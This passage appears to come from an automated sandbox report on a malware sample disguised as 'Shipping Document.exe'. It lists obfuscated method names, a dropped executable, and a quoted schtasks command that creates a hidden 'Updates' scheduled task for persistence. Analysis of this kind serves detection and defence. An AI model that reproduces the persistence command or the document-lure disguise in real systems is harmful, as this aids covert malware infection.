                Source: 0.2.Shipping Document.exe.41d38f0.6.raw.unpack, m4ifnYVmIeQeNVfHwS.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'SHRrDd619V', 'OBsrqBrWZC', 'UVJrzoVLmk', 'UePT9jIAu2', 'O7IT7KD3tM', 'SQCTrio05G', 'uo7TTX5yd3', 'bca6u1q57MH0coUf6BM'
                Source: 0.2.Shipping Document.exe.41d38f0.6.raw.unpack, cZaLqkrPjuZss87qNC.csHigh entropy of concatenated method names: 'Eaakhiyy0', 'KcYvm0Qfs', 'eBhpywZPC', 'Wf1y5OmNE', 'AdrLi1qI5', 'PI0hk5roo', 'K5VkJTS2IR5eA9DumB', 'KKYvIdwjY8PfjrX1OX', 'rgCGfGk73', 'ihFIfcByd'
                Source: 0.2.Shipping Document.exe.41d38f0.6.raw.unpack, w0cHSBC9YZ920FR27s.csHigh entropy of concatenated method names: 'J5QKuhep0v', 'O2XKB7SpDQ', 'ToString', 'xX8K8rh4qg', 'hWRKciy8KI', 'tt8KVRJDUx', 'i9LKtXjdhh', 'feZKbk6XVR', 'fdAKYOchA0', 'YTiKaOQY7U'
                Source: 0.2.Shipping Document.exe.41d38f0.6.raw.unpack, SEHKQw3SBefxUN5Qlk.csHigh entropy of concatenated method names: 'WgTjfyQ87I', 'zx9jL8Unny', 'TTAjRri0U3', 'FnFjOA5Kiy', 'OoKjE0YXyT', 'LeqjonUTJi', 'YsmjWQ35OW', 'm2BjsAQyVk', 'y3hj1EjTah', 'rrqjduIP0O'
                Source: 0.2.Shipping Document.exe.41d38f0.6.raw.unpack, NNA24mLJObF0Y8gmVg.csHigh entropy of concatenated method names: 'rrBVvfXBeF', 'mbeVpyRWM7', 'X9sVf0rbHJ', 'p80VLZAFsN', 'YbyVlE3eY3', 'T2mVw6ec8F', 'UYCVKVl2EM', 'LnvVGY1Qcb', 'sNnVxui14I', 'IM8VID4vyX'
                Source: 0.2.Shipping Document.exe.41d38f0.6.raw.unpack, DI9IOsHnWmXiyPv2gr.csHigh entropy of concatenated method names: 'i6Gxl4RigR', 'tAMxKm3uPq', 'T1SxxoNKmS', 'X18xSYCKvw', 'phsxihAvLM', 'RBsxnDE5vP', 'Dispose', 'jH2G8AEZH5', 'y35Gc0jX8Y', 'NlhGV9fMrT'
                Source: 0.2.Shipping Document.exe.41d38f0.6.raw.unpack, mYuBxX5y3QFtX3Y1Qp.csHigh entropy of concatenated method names: 'ToString', 'YFewdo10hE', 'DYpwOg5MyU', 'YViwZPx0iC', 'eSbwE1uEZT', 'vR2wo3o8mC', 'LKlwX168lE', 'I7rwWvm8Oy', 'mnXwsQp5du', 'EVKw6X23aA'
                Source: 0.2.Shipping Document.exe.41d38f0.6.raw.unpack, F7dFk7fClPC3QVcrtR.csHigh entropy of concatenated method names: 'IQ1cQxEFNB', 'guTcUO11sq', 'efWc5tIXX5', 'jMUcCyGbgU', 'zicc4KAoOK', 'qOCcgpoQn7', 'TpUcH4kNc7', 'dd0cmi9tYU', 'qjYcDUXQqi', 'Q5JcqhXkgO'
                Source: 0.2.Shipping Document.exe.41d38f0.6.raw.unpack, V9a8Lxh7SJDtCArE0g.csHigh entropy of concatenated method names: 'TmMtNm7Ed5', 'HWlty6HC0d', 'eCYVZbaiNf', 'MsVVERNHlK', 'qW9Voq6D8e', 'VcCVX1wdSX', 'iTDVWIHA2t', 'dlDVsXqLlH', 'JFUV6Lbvaj', 'UvHV184huT'
                Source: 0.2.Shipping Document.exe.41d38f0.6.raw.unpack, YkER94q6wgiamQlpyt.csHigh entropy of concatenated method names: 'QvEIVtgamv', 'zA4It8b61W', 'V4yIbhT16P', 'oopIYT0OHU', 'dBsIxVu6aA', 'urhIaO2RQM', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.Shipping Document.exe.41d38f0.6.raw.unpack, XxRrBoRYHAhRJ9d1hx.csHigh entropy of concatenated method names: 'KuZbMZJai7', 'BrObcB0U7M', 'YpqbtaoPrW', 'yUobYIBbEb', 'lH1baXwLMR', 'KIjt4ZrLhv', 'PErtgHuGdA', 'kG7tHMuvna', 'FFEtmyk62r', 'KYMtDlMefl'
                Source: 0.2.Shipping Document.exe.41d38f0.6.raw.unpack, K13cVp77eDhDLX23eCa.csHigh entropy of concatenated method names: 'hodIquUZLF', 'iaEIzOVj3G', 'DqtS9FESXL', 'RL9S75d92j', 'TkFSrAhTmh', 'yntSTi2w5p', 'CCaSAnR5Rx', 'vMgSMxlo27', 'MDQS8xlD8n', 'eMHSc5Batb'
                Source: 0.2.Shipping Document.exe.41d38f0.6.raw.unpack, LVixqdDKiqODDhE0AD.csHigh entropy of concatenated method names: 'NpDxRN3tfW', 'IqRxOfcWoP', 'Q65xZJEaTg', 'eewxEEDeAK', 'NUExo8hXPY', 'GRAxXYIEI8', 'B1TxWOPdXA', 'rOBxst3x0Z', 'sSUx67sCDa', 'cNLx1JGFDi'
                Source: 0.2.Shipping Document.exe.41d38f0.6.raw.unpack, EUCmVyzOIn3f4YK45Z.csHigh entropy of concatenated method names: 'bgjIpcWWTY', 'CdRIf8s5VJ', 'J6GILaZ9EQ', 'uAcIREYfBi', 'EU4IOmdekf', 'xH8IE9bkDs', 'nQmIooEQIX', 'Oj5InTbDrW', 'Tc1IFvu0he', 'E72IPVjxSP'
                Source: 0.2.Shipping Document.exe.41d38f0.6.raw.unpack, VtRbyDAZjAG166sI2i.csHigh entropy of concatenated method names: 'm6h7Y7dFk7', 'TlP7aC3QVc', 'XJO7ubF0Y8', 'VmV7BgH9a8', 'erE7l0gmxR', 'cBo7wYHAhR', 'rxvOJxQmHQduEgA5nO', 'LgVHTgFVCk4UD5Llf4', 'K9U77yJOOH', 'v1h7TPUdYv'
                Source: 0.2.Shipping Document.exe.41d38f0.6.raw.unpack, nMxMf67AEbxBe3ZHhK8.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'KoXexB1i4w', 'LR8eILZos8', 'viPeSfsP4D', 'pFAeeL7pm0', 'T2xei1U3WB', 'EaAe0qORi1', 'VtlenQtIyw'
                Source: 0.2.Shipping Document.exe.41d38f0.6.raw.unpack, vj1yyY7TvHQ5YX1cMa9.csHigh entropy of concatenated method names: 'jgJSqWpLlY', 'Dd4SzBCxD3', 'TPFe9QZWSu', 'bJsTToWqjtMaNhknH5f', 'GuC1hIW5mqBFgdqXYZ5', 'Afbuf0WA41KOKyQaIc2'
                Source: 0.2.Shipping Document.exe.4148ed0.5.raw.unpack, e6tPm0aIb7UvqPflDt.csHigh entropy of concatenated method names: 'ev2TM4VHRD', 'q2ZT85jiWW', 'A30TcAPup7', 'jV3TVKrDDJ', 'HtdTt9eNAt', 'HRaTbgcmAs', 'TdWTY8N9dO', 'FXNTa7k0iD', 'lToTJXdfNM', 'iBHTul0BnY'
                Source: 0.2.Shipping Document.exe.4148ed0.5.raw.unpack, QK1XyLcrf1gUppmsAj.csHigh entropy of concatenated method names: 'Dispose', 'WXi7DyPv2g', 'kNgrOUJlho', 'YeVI5FHF7T', 'bos7qPO42i', 'Jo47zrnMOd', 'ProcessDialogKey', 'vpWr9Vixqd', 'piqr7ODDhE', 'vADrrDkER9'
                Source: 0.2.Shipping Document.exe.4148ed0.5.raw.unpack, pmYHbZ63s7duoTHIGq.csHigh entropy of concatenated method names: 'qoqYF0sMnZ', 'aZjYP2BUwN', 'WUMYkOAgRj', 'NsjYvhe977', 'NWmYNWRiwF', 'r6PYpFhQcO', 'NGdYyOqfym', 'd9jYfDMxNR', 'VaFYLq0eGJ', 'Qb0Yh2VtWT'
                Source: 0.2.Shipping Document.exe.4148ed0.5.raw.unpack, F6CiRLgqx6Lxnpnjqk.csHigh entropy of concatenated method names: 'ykqKmBdFae', 'gWCKqNMIUv', 'DdDG9rtfDY', 'HMEG78seKY', 'HwZKdOfHud', 'S3CK2eOndx', 'CbXK3gy85B', 'ovIKQSRmg5', 'k8FKUQNpuL', 'LuUK5kDi5u'
                Source: 0.2.Shipping Document.exe.4148ed0.5.raw.unpack, m4ifnYVmIeQeNVfHwS.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'SHRrDd619V', 'OBsrqBrWZC', 'UVJrzoVLmk', 'UePT9jIAu2', 'O7IT7KD3tM', 'SQCTrio05G', 'uo7TTX5yd3', 'bca6u1q57MH0coUf6BM'
                Source: 0.2.Shipping Document.exe.4148ed0.5.raw.unpack, cZaLqkrPjuZss87qNC.csHigh entropy of concatenated method names: 'Eaakhiyy0', 'KcYvm0Qfs', 'eBhpywZPC', 'Wf1y5OmNE', 'AdrLi1qI5', 'PI0hk5roo', 'K5VkJTS2IR5eA9DumB', 'KKYvIdwjY8PfjrX1OX', 'rgCGfGk73', 'ihFIfcByd'
                Source: 0.2.Shipping Document.exe.4148ed0.5.raw.unpack, w0cHSBC9YZ920FR27s.csHigh entropy of concatenated method names: 'J5QKuhep0v', 'O2XKB7SpDQ', 'ToString', 'xX8K8rh4qg', 'hWRKciy8KI', 'tt8KVRJDUx', 'i9LKtXjdhh', 'feZKbk6XVR', 'fdAKYOchA0', 'YTiKaOQY7U'
                Source: 0.2.Shipping Document.exe.4148ed0.5.raw.unpack, SEHKQw3SBefxUN5Qlk.csHigh entropy of concatenated method names: 'WgTjfyQ87I', 'zx9jL8Unny', 'TTAjRri0U3', 'FnFjOA5Kiy', 'OoKjE0YXyT', 'LeqjonUTJi', 'YsmjWQ35OW', 'm2BjsAQyVk', 'y3hj1EjTah', 'rrqjduIP0O'
                Source: 0.2.Shipping Document.exe.4148ed0.5.raw.unpack, NNA24mLJObF0Y8gmVg.csHigh entropy of concatenated method names: 'rrBVvfXBeF', 'mbeVpyRWM7', 'X9sVf0rbHJ', 'p80VLZAFsN', 'YbyVlE3eY3', 'T2mVw6ec8F', 'UYCVKVl2EM', 'LnvVGY1Qcb', 'sNnVxui14I', 'IM8VID4vyX'
                Source: 0.2.Shipping Document.exe.4148ed0.5.raw.unpack, DI9IOsHnWmXiyPv2gr.csHigh entropy of concatenated method names: 'i6Gxl4RigR', 'tAMxKm3uPq', 'T1SxxoNKmS', 'X18xSYCKvw', 'phsxihAvLM', 'RBsxnDE5vP', 'Dispose', 'jH2G8AEZH5', 'y35Gc0jX8Y', 'NlhGV9fMrT'
                Source: 0.2.Shipping Document.exe.4148ed0.5.raw.unpack, mYuBxX5y3QFtX3Y1Qp.csHigh entropy of concatenated method names: 'ToString', 'YFewdo10hE', 'DYpwOg5MyU', 'YViwZPx0iC', 'eSbwE1uEZT', 'vR2wo3o8mC', 'LKlwX168lE', 'I7rwWvm8Oy', 'mnXwsQp5du', 'EVKw6X23aA'
                Source: 0.2.Shipping Document.exe.4148ed0.5.raw.unpack, F7dFk7fClPC3QVcrtR.csHigh entropy of concatenated method names: 'IQ1cQxEFNB', 'guTcUO11sq', 'efWc5tIXX5', 'jMUcCyGbgU', 'zicc4KAoOK', 'qOCcgpoQn7', 'TpUcH4kNc7', 'dd0cmi9tYU', 'qjYcDUXQqi', 'Q5JcqhXkgO'
                Source: 0.2.Shipping Document.exe.4148ed0.5.raw.unpack, V9a8Lxh7SJDtCArE0g.csHigh entropy of concatenated method names: 'TmMtNm7Ed5', 'HWlty6HC0d', 'eCYVZbaiNf', 'MsVVERNHlK', 'qW9Voq6D8e', 'VcCVX1wdSX', 'iTDVWIHA2t', 'dlDVsXqLlH', 'JFUV6Lbvaj', 'UvHV184huT'
                Source: 0.2.Shipping Document.exe.4148ed0.5.raw.unpack, YkER94q6wgiamQlpyt.csHigh entropy of concatenated method names: 'QvEIVtgamv', 'zA4It8b61W', 'V4yIbhT16P', 'oopIYT0OHU', 'dBsIxVu6aA', 'urhIaO2RQM', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.Shipping Document.exe.4148ed0.5.raw.unpack, XxRrBoRYHAhRJ9d1hx.csHigh entropy of concatenated method names: 'KuZbMZJai7', 'BrObcB0U7M', 'YpqbtaoPrW', 'yUobYIBbEb', 'lH1baXwLMR', 'KIjt4ZrLhv', 'PErtgHuGdA', 'kG7tHMuvna', 'FFEtmyk62r', 'KYMtDlMefl'
                Source: 0.2.Shipping Document.exe.4148ed0.5.raw.unpack, K13cVp77eDhDLX23eCa.csHigh entropy of concatenated method names: 'hodIquUZLF', 'iaEIzOVj3G', 'DqtS9FESXL', 'RL9S75d92j', 'TkFSrAhTmh', 'yntSTi2w5p', 'CCaSAnR5Rx', 'vMgSMxlo27', 'MDQS8xlD8n', 'eMHSc5Batb'
                Source: 0.2.Shipping Document.exe.4148ed0.5.raw.unpack, LVixqdDKiqODDhE0AD.csHigh entropy of concatenated method names: 'NpDxRN3tfW', 'IqRxOfcWoP', 'Q65xZJEaTg', 'eewxEEDeAK', 'NUExo8hXPY', 'GRAxXYIEI8', 'B1TxWOPdXA', 'rOBxst3x0Z', 'sSUx67sCDa', 'cNLx1JGFDi'
                Source: 0.2.Shipping Document.exe.4148ed0.5.raw.unpack, EUCmVyzOIn3f4YK45Z.csHigh entropy of concatenated method names: 'bgjIpcWWTY', 'CdRIf8s5VJ', 'J6GILaZ9EQ', 'uAcIREYfBi', 'EU4IOmdekf', 'xH8IE9bkDs', 'nQmIooEQIX', 'Oj5InTbDrW', 'Tc1IFvu0he', 'E72IPVjxSP'
                Source: 0.2.Shipping Document.exe.4148ed0.5.raw.unpack, VtRbyDAZjAG166sI2i.csHigh entropy of concatenated method names: 'm6h7Y7dFk7', 'TlP7aC3QVc', 'XJO7ubF0Y8', 'VmV7BgH9a8', 'erE7l0gmxR', 'cBo7wYHAhR', 'rxvOJxQmHQduEgA5nO', 'LgVHTgFVCk4UD5Llf4', 'K9U77yJOOH', 'v1h7TPUdYv'
                Source: 0.2.Shipping Document.exe.4148ed0.5.raw.unpack, nMxMf67AEbxBe3ZHhK8.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'KoXexB1i4w', 'LR8eILZos8', 'viPeSfsP4D', 'pFAeeL7pm0', 'T2xei1U3WB', 'EaAe0qORi1', 'VtlenQtIyw'
                Source: 0.2.Shipping Document.exe.4148ed0.5.raw.unpack, vj1yyY7TvHQ5YX1cMa9.csHigh entropy of concatenated method names: 'jgJSqWpLlY', 'Dd4SzBCxD3', 'TPFe9QZWSu', 'bJsTToWqjtMaNhknH5f', 'GuC1hIW5mqBFgdqXYZ5', 'Afbuf0WA41KOKyQaIc2'
                Source: C:\Users\user\Desktop\Shipping Document.exeFile created: C:\Users\user\AppData\Roaming\KOENBvWt.exeJump to dropped file

                Boot Survival

                barindex
                Uses schtasks.exe or at.exe to add and modify task schedules
                Source: C:\Users\user\Desktop\Shipping Document.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KOENBvWt" /XML "C:\Users\user\AppData\Local\Temp\tmpC1E2.tmp"

                Hooking and other Techniques for Hiding and Protection

                barindex
                Loading BitLocker PowerShell Module
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
